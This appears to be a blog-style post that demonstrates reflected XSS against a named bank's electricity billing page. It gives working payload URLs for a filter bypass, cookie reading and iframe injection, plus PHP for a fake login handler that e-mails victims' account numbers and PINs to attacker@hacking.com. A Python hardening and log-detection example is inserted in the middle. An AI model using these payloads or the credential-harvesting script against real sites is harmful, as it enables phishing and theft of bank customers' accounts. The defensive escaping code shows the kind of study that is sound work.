Fake Login Page with XSS IFRAME | C B Bank - Online Electricity Billing Payment System(GBPS)

When XSS vulnerabilities on bank websites are exploited by phishers, it is too late to undo the unwanted consequences. The phishers are able to inject a modified login form into the bank’s login page, specifically an IFRAME that loads the fake login form from a web server they control. Even if the login page uses SSL, that does not mean it is secure against XSS attacks: the injected content is delivered over the bank’s own HTTPS page, so the browser shows the genuine address and certificate. Customers who are unaware of web security are easily tricked into entering sensitive personal information, especially if the cross-site scripting attack vector is obfuscated.

Cross-site scripting (XSS) is where one site manages to run a script on another site, with your privileges as the user, using a browser-side scripting language (usually JavaScript). The goal of the attacker is to make the malicious script appear to come from the site being attacked, so the user’s browser cannot tell that the script being executed is not meant to be part of the site they are viewing. An attacker usually accomplishes this by submitting specially crafted values into the target site’s URL or web forms, or anywhere user-generated content is displayed on the site.

Note: Educational purpose only.

Well, let me show you something about a fake login page with XSS, using an IFRAME.
First I’m going to visit the following site:

http://www.cbbankmm.com/gbps_meter.php?l=e


Yes, it’s normal. Now try to insert some XSS scripts.

Basic XSS code:

http://www.cbbankmm.com/gbps_meter.php?l=e<script>alert("XSS")</script>


Nope, the plain payload does not fire.

Test again with this payload, which bypasses the script tag filtering:

http://www.cbbankmm.com/gbps_meter.php?l=e'><script>alert("XSS")</script>


Grab cookies with XSS:

http://www.cbbankmm.com/gbps_meter.php?l=e'><script>alert(document.cookie)</script>


IFRAME injection:

http://www.cbbankmm.com/gbps_meter.php?l=e'><iframe src="http://planetcreator.net"></iframe>

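To make the defensive point concrete, here is an added example (not code from this post, nor the bank’s own code) that mimics the reflection pattern the payloads above rely on: the l parameter is written unescaped into a single-quoted attribute, so a value beginning with '> closes the attribute and the tag. The same template with quote-aware escaping neutralises the payloads, and a small detector flags such probes in URL-decoded query strings. The template, the tag names it emits and the log pattern are assumptions.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Payloads quoted in the post, as the decoded value of the "l" parameter (constructed sample input).
PAYLOADS = {
    "normal": "e",
    "script": "e'><script>alert(\"XSS\")</script>",
    "iframe": "e'><iframe src=\"http://planetcreator.net\"></iframe>",
}

# Hypothetical template: the parameter is reflected into a single-quoted hidden field.
TEMPLATE = "<form><input type='hidden' name='l' value='{value}'><input type='text' name='txtAccountNo'></form>"


def render_vulnerable(l: str) -> str:
    """Reflects the raw parameter; a value beginning with '> closes the attribute and the tag."""
    return TEMPLATE.format(value=l)


def render_hardened(l: str) -> str:
    """Escapes &, <, >, \" and ' before reflection (PHP equivalent: htmlspecialchars($l, ENT_QUOTES))."""
    return TEMPLATE.format(value=html.escape(l, quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(page: str) -> list:
    """Start tags the template never emits; any hit means the parameter escaped its attribute context."""
    parser = _TagCollector()
    parser.feed(page)
    return [t for t in parser.tags if t not in ("form", "input")]


# Assumed detection pattern for web-server access logs: decode the query string first,
# because probes usually arrive URL-encoded (%3Cscript%3E).
_PROBE = re.compile(r"<\s*(script|iframe)\b", re.IGNORECASE)


def is_xss_probe(raw_query: str) -> bool:
    """True when a decoded query string carries a script or iframe tag, as in the URLs above."""
    return bool(_PROBE.search(unquote_plus(raw_query)))
```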

Finally: let’s create the fake login page with PHP.

– Clone the original page

– Go to the login form (tag)

– Write some script … That’s all.

<?php
// Fake login handler exactly as posted, with comments added for the reader.
// It never verifies the credentials against anything; it only captures them.
if(isset($_POST['submit'])) {
	error_reporting(0);   // suppress PHP warnings so the victim sees a clean page
	$txtAccountNo = mysql_real_escape_string($_POST['txtAccountNo']);
	$txtPinCode = mysql_real_escape_string($_POST['txtPinCode']);
	$txtCapcha = mysql_real_escape_string($_POST['txtCapcha']);
	// The validation messages mimic the real form so the page looks legitimate
	if($txtAccountNo==""){
		$msg="Your account number is empty";
	}elseif($txtPinCode==""){
		$msg="Your pin number is empty";
	}elseif($txtCapcha==""){
		$msg="Please enter your Capcha Code";
	}elseif($txtCapcha !="odj03I0"){   // hard-coded "captcha" value
		$msg="Check Capcha code and type again";
	}else{
		// The captured account number and PIN are e-mailed to the attacker's address
		$email_contents= $txtAccountNo." | ".$txtPinCode;
		$mail = mail("attacker@hacking.com", "Acc Info from CB", $email_contents);
		// The victim is then sent on to the genuine billing login page
		header("https://billing.yatanarpon.com.mm/electricity/cbbank/default.aspx?Type=Large");
	}
}
?>


This fake login form can convincingly gather a user’s credentials, namely the account number and PIN. If the victim logs in via the fake login page, the account number and PIN are transmitted to the fraudsters, and the victim is then presented with the original login page. The information requested is the account number and the PIN number.

We hope that your security staff will look into this issue and fix it as soon as possible.
